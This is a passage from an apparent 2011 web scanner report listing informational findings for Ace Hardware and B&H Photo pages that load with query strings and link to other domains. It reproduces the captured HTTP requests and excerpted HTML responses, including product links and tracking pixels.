   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Whats New');turnOnTab(3);" onmouseover="imgOn('tab3');" onmouseout="imgOff('tab3');"><img id="tab3" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_whatsnew_off.gif" width="93" height="23" alt="What's New" border="0" /></a>
...[SNIP]...
cation.href='/product/index.jsp?productId=11560715&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Living Accents. LeClaire 5-Piece Fire Chat Set');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9288743th.jpg"></a>
...[SNIP]...
duct/index.jsp?productId=11193066&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Scotts&reg; Nature Scapes Brown Color Enhanced Mulch (88652795)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9503764th.jpg"></a>
...[SNIP]...
.location.href='/product/index.jsp?productId=3832732&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Fiskars. 58 Gal Salsa Rain Barrel (59988935)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6778856th.jpg"></a>
...[SNIP]...
on.href='/product/index.jsp?productId=10918193&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Weber. Genesis. EP-330 Propane Gas Grill (6531301)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8996103th.jpg"></a>
...[SNIP]...
indow.location.href='/product/index.jsp?productId=3332071&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Ducane. Affinity. 3100 Propane Gas Grill (31731101)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-5340378th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=3948588&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. Kingsley Patio Collection');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6932339_group_th.jpg"></a>
...[SNIP]...
2" onClick="window.location.href='/product/index.jsp?productId=11133082&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. 3-Person Canopy Swing');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9407041th.jpg"></a>
...[SNIP]...
nClick="window.location.href='/product/index.jsp?productId=3914716&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. Lexington Steel Park Bench');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6935410th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=11228241&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Flo N' Go&reg; Superflo Siphon/Pump (08339)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9583936th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=11227922&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Union&reg; 9in Half Mood Turf Edger (61102)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9583938th.jpg"></a>
...[SNIP]...
="window.location.href='/product/index.jsp?productId=11221138&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Rockwell&reg; Blade Runner with Wall Mount (RK7321)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9554133th.jpg"></a>
...[SNIP]...
ow.location.href='/product/index.jsp?productId=11221117&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Twin Draft Guard&reg; 8x15in Magnetic Vent Covers (60260)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9554207th.jpg"></a>
...[SNIP]...
43685" onClick="window.location.href='/product/index.jsp?productId=11643685&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40&reg; 12oz Smart Straw - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-10335417th.jpg"></a>
...[SNIP]...
productId=11636779" onClick="window.location.href='/product/index.jsp?productId=11636779&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40&reg; 1gal - 4 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-1202036th.gif"></a>
...[SNIP]...
77" onClick="window.location.href='/product/index.jsp?productId=11636777&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40&reg; 3oz Spray Lubricant - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-1202039th.gif"></a>
...[SNIP]...
771" onClick="window.location.href='/product/index.jsp?productId=11636771&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:3-In-1&reg; 3oz Household Oil - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-958748th.gif"></a>
...[SNIP]...
<!-- end tabs -->

   <img class="fR dB pR t1 l1" src="http://ACE.imageg.net/images/home_tabset_br.gif" width="12" height="13" alt="" border="0" />
   <div class="cB">
...[SNIP]...
</a><img border="0" name="AceRewardsVisaLower_042611" src="http://ACE.imageg.net/cms_widgets/46/44/464447_assets/AceRewardsVisa_Widget.png" height="53" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL2');" /></div>
...[SNIP]...
</a><img border="0" name="Ship to Store Logo 100108 2" src="http://ACE.imageg.net/cms_widgets/86/86/86861_assets/ace_199x53_freests.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL3');" /></div>
...[SNIP]...
</a><img border="0" name="Rebate 11-24-08" src="http://ACE.imageg.net/cms_widgets/10/34/103412_assets/rebatecenter.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL4');" /></div>
...[SNIP]...
<div id="homePandS" class="h250 mB10">
                   <img src="http://ACE.imageg.net/images/home_projectsandsolutionsSmall.jpg" alt="" width="199" height="238" border="0" usemap="#home_projectsandsolutions" />
                   <map name="home_projectsandsolutions">
...[SNIP]...
<div id="ace_home_5" style="width:199px;border:0px;overflow:hidden;">
<img border="0" name="social_media_199x53" src="http://ACE.imageg.net/cms_widgets/20/33/203388_assets/110786_TwitterYouTubeSpot.jpg" height="53" width="199" align="Default" valign="Default" usemap="#social_map" /><map name="social_map"><area shape="rect" coords="0,0,67,53" title="Facebook" href="http://facebook.com/acehardware"/><area shape="rect" coords="67,0,122,53" title="Twitter" href="http://twitter.com/acehardware"/><area shape="rect" coords="122,0,199,53" title="YouTube" href="http://youtube.com/acehardware"/></map>
...[SNIP]...
<div class="fL pLR12 pB6 bR1_c5"><a href="http://WWW.ACEREWARDSVISA.COM/PLA6" class="stdRed fB f9" target="_blank">Ace Rewards Visa</a>
...[SNIP]...
<div class="fL pLR12 pB6"><a href="http://acehardware.shoplocal.com/acehardwarecircular/new_user_entry.aspx" class="stdRed fB f9">Shop Our Ad</a>
...[SNIP]...
</div>
       <img class="dB" src="http://ACE.imageg.net/images/ftr_wood.gif" width="778" height="22" alt="" border="0" />
       <div class="mLRa" style="width: 671px;">
...[SNIP]...
<div class="fL pLR6 pT6 bR1_c5"><a href="http://www.myace.com" class="stdGray f9" target="_blank">Own an Ace Store</a>
...[SNIP]...
<td valign=top><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=acehrdwre_gsi_cs=1&betq=970=349145" width="1" height="1" border="0"></td>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">

<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=82078877?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">
           

           <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...
<!--You are running on ashprd2_ws_47_5-->


<script src="http://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...
<!-- end sitebg -->

   <img class="dB" src="http://ACE.imageg.net/images/bgCap.gif" width="812" height="23" alt="" border="0" />

   <!-- START SCANALERT CODE -->
...[SNIP]...
<div class="w65 mLRa"><a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.acehardware.com"><img src="https://images.scanalert.com/meter/www.acehardware.com/31.gif" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...

17.25. http://www.acehardware.com/home/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /home/index.jsp?rdir=1A HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305544625524%3B; JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>

<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/DF_ACE_main.css" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_home.css" />
<style type="text/css">
...[SNIP]...
shops online, hardware store online, hardware stores online, hardware retailer, home improvement, home improvements, home improvement store, home improvement stores, home improvement retailers" />


   <link rel="shortcut icon" href="http://ACE.imageg.net/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/WIZ_ACE_topNav.css" />
   
   
       <meta property="fb:page_id" content="4949752878"/>
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_home.css" />-->
   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
...[SNIP]...
<noscript><img class="dN" src="http://ad.doubleclick.net/activity;src=1048698;type=aceha631;cat=homep154;ord=1;num=1?" width="1" height="1" alt="" border="0" /></noscript>
<!-- End of DoubleClick Spotlight Tag: Please do not remove-->
<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_TempTizzy.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
<link rel="stylesheet" href="http://ACE.imageg.net/include/minicart_ace.css">
<div id="minicart" class="minicart_ace">
...[SNIP]...
<a href="https://www.acehardware.com/acerewards/index.jsp?step=aceRewardsHub"><img id="rightitem" src="http://ACE.imageg.net/images/breadcrumb_ad.gif" width="206" height="44" alt="" border="0" /></a>
...[SNIP]...
</a><img border="0" name="cms_image84006029" src="http://ACE.imageg.net/cms_widgets/47/32/473257_assets/static_114332.png" height="261" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL0');" /></div>
...[SNIP]...
<div id="ace_home_2" style="width:572px;border:0px;overflow:hidden;">


<img border="0" name="HomepageBrandBar_032511" src="http://ACE.imageg.net/cms_widgets/44/10/441077_assets/homepagebb.jpg" height="53" width="572" align="Default" valign="Default" usemap="#HomepageBrandBarMap" /><map name="HomepageBrandBarMap">
...[SNIP]...
</div>

               
                               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_home.js"></script>
               
               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
<a href="javascript:void(0);" onclick="omni_TabClick('Home:Featured Products');turnOnTab(0);" onmouseover="imgOn('tab0');" onmouseout="imgOff('tab0');" class="cP"><img id="tab0" class="fL dB pR t1 cP" src="http://ACE.imageg.net/images/home_tabs_featprods_on.gif" width="132" height="23" alt="Featured Products" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Sellers');turnOnTab(1);" onmouseover="imgOn('tab1');" onmouseout="imgOff('tab1');"><img id="tab1" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_topsellers_off.gif" width="95" height="23" alt="Top Sellers" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Rated');turnOnTab(2);" onmouseover="imgOn('tab2');" onmouseout="imgOff('tab2');"><img id="tab2" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_toprated_off.gif" width="84" height="23" alt="Top Rated" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Whats New');turnOnTab(3);" onmouseover="imgOn('tab3');" onmouseout="imgOff('tab3');"><img id="tab3" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_whatsnew_off.gif" width="93" height="23" alt="What's New" border="0" /></a>
...[SNIP]...
cation.href='/product/index.jsp?productId=11560715&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Living Accents. LeClaire 5-Piece Fire Chat Set');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9288743th.jpg"></a>
...[SNIP]...
duct/index.jsp?productId=11193066&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Scotts&reg; Nature Scapes Brown Color Enhanced Mulch (88652795)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9503764th.jpg"></a>
...[SNIP]...
.location.href='/product/index.jsp?productId=3832732&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Fiskars. 58 Gal Salsa Rain Barrel (59988935)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6778856th.jpg"></a>
...[SNIP]...
on.href='/product/index.jsp?productId=10918193&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Weber. Genesis. EP-330 Propane Gas Grill (6531301)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8996103th.jpg"></a>
...[SNIP]...
indow.location.href='/product/index.jsp?productId=3332071&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Ducane. Affinity. 3100 Propane Gas Grill (31731101)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-5340378th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=3948588&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. Kingsley Patio Collection');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6932339_group_th.jpg"></a>
...[SNIP]...
2" onClick="window.location.href='/product/index.jsp?productId=11133082&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. 3-Person Canopy Swing');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9407041th.jpg"></a>
...[SNIP]...
nClick="window.location.href='/product/index.jsp?productId=3914716&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. Lexington Steel Park Bench');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6935410th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=11228241&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Flo N' Go&reg; Superflo Siphon/Pump (08339)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9583936th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=11227922&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Union&reg; 9in Half Mood Turf Edger (61102)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9583938th.jpg"></a>
...[SNIP]...
="window.location.href='/product/index.jsp?productId=11221138&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Rockwell&reg; Blade Runner with Wall Mount (RK7321)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9554133th.jpg"></a>
...[SNIP]...
ow.location.href='/product/index.jsp?productId=11221117&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Twin Draft Guard&reg; 8x15in Magnetic Vent Covers (60260)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9554207th.jpg"></a>
...[SNIP]...
43685" onClick="window.location.href='/product/index.jsp?productId=11643685&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40&reg; 12oz Smart Straw - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-10335417th.jpg"></a>
...[SNIP]...
productId=11636779" onClick="window.location.href='/product/index.jsp?productId=11636779&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40&reg; 1gal - 4 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-1202036th.gif"></a>
...[SNIP]...
77" onClick="window.location.href='/product/index.jsp?productId=11636777&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40&reg; 3oz Spray Lubricant - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-1202039th.gif"></a>
...[SNIP]...
771" onClick="window.location.href='/product/index.jsp?productId=11636771&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:3-In-1&reg; 3oz Household Oil - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-958748th.gif"></a>
...[SNIP]...
<!-- end tabs -->

   <img class="fR dB pR t1 l1" src="http://ACE.imageg.net/images/home_tabset_br.gif" width="12" height="13" alt="" border="0" />
   <div class="cB">
...[SNIP]...
</a><img border="0" name="AceRewardsVisaLower_042611" src="http://ACE.imageg.net/cms_widgets/46/44/464447_assets/AceRewardsVisa_Widget.png" height="53" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL2');" /></div>
...[SNIP]...
</a><img border="0" name="Ship to Store Logo 100108 2" src="http://ACE.imageg.net/cms_widgets/86/86/86861_assets/ace_199x53_freests.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL3');" /></div>
...[SNIP]...
</a><img border="0" name="Rebate 11-24-08" src="http://ACE.imageg.net/cms_widgets/10/34/103412_assets/rebatecenter.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL4');" /></div>
...[SNIP]...
<div id="homePandS" class="h250 mB10">
                   <img src="http://ACE.imageg.net/images/home_projectsandsolutionsSmall.jpg" alt="" width="199" height="238" border="0" usemap="#home_projectsandsolutions" />
                   <map name="home_projectsandsolutions">
...[SNIP]...
<div id="ace_home_5" style="width:199px;border:0px;overflow:hidden;">
<img border="0" name="social_media_199x53" src="http://ACE.imageg.net/cms_widgets/20/33/203388_assets/110786_TwitterYouTubeSpot.jpg" height="53" width="199" align="Default" valign="Default" usemap="#social_map" /><map name="social_map"><area shape="rect" coords="0,0,67,53" title="Facebook" href="http://facebook.com/acehardware"/><area shape="rect" coords="67,0,122,53" title="Twitter" href="http://twitter.com/acehardware"/><area shape="rect" coords="122,0,199,53" title="YouTube" href="http://youtube.com/acehardware"/></map>
...[SNIP]...
<div class="fL pLR12 pB6 bR1_c5"><a href="http://WWW.ACEREWARDSVISA.COM/PLA6" class="stdRed fB f9" target="_blank">Ace Rewards Visa</a>
...[SNIP]...
<div class="fL pLR12 pB6"><a href="http://acehardware.shoplocal.com/acehardwarecircular/new_user_entry.aspx" class="stdRed fB f9">Shop Our Ad</a>
...[SNIP]...
</div>
       <img class="dB" src="http://ACE.imageg.net/images/ftr_wood.gif" width="778" height="22" alt="" border="0" />
       <div class="mLRa" style="width: 671px;">
...[SNIP]...
<div class="fL pLR6 pT6 bR1_c5"><a href="http://www.myace.com" class="stdGray f9" target="_blank">Own an Ace Store</a>
...[SNIP]...
<td valign=top><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=acehrdwre_gsi_cs=1&betq=970=349145" width="1" height="1" border="0"></td>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">

<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=45060074?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">
           

           <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...
<!--You are running on ashprd2_ws_47_5-->


<script src="http://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...
<!-- end sitebg -->

   <img class="dB" src="http://ACE.imageg.net/images/bgCap.gif" width="812" height="23" alt="" border="0" />

   <!-- START SCANALERT CODE -->
...[SNIP]...
<div class="w65 mLRa"><a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.acehardware.com"><img src="https://images.scanalert.com/meter/www.acehardware.com/31.gif" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...

17.26. https://www.acehardware.com/checkout/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /checkout/index.jsp

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510830898}; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">
           

           <iframe src='https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...
<!--You are running on ashprd2_ws_46_6-->


<script src="https://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...
<a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.acehardware.com"><img src="https://images.scanalert.com/meter/www.acehardware.com/31.gif" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...

17.27. http://www.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The page was loaded from a URL containing a query string (see the request line below). The response contains the following links to other domains (see the excerpted response below).

Request

GET /bnh/controller/home?KW=BANNER2&img=bh_wl.gif HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; TS29f0cc=d35b183be3c07378b7d4c90c4d1f57e3871d7ea6dc67d58e4dd0802d60ac0ec5a2f86729b092ce85bc587bdd; cmTPSet=Y

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Expires: Mon, 16 May 2011 01:52:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:52:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS29f0cc=7f329831c9f74bab89d73187e3b1cfd8871d7ea6dc67d58e4dd0837960ac0ec5a2f86729b092ce85bc587bdd; Path=/
Content-Length: 39479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>B&amp;H Photo Vi
...[SNIP]...
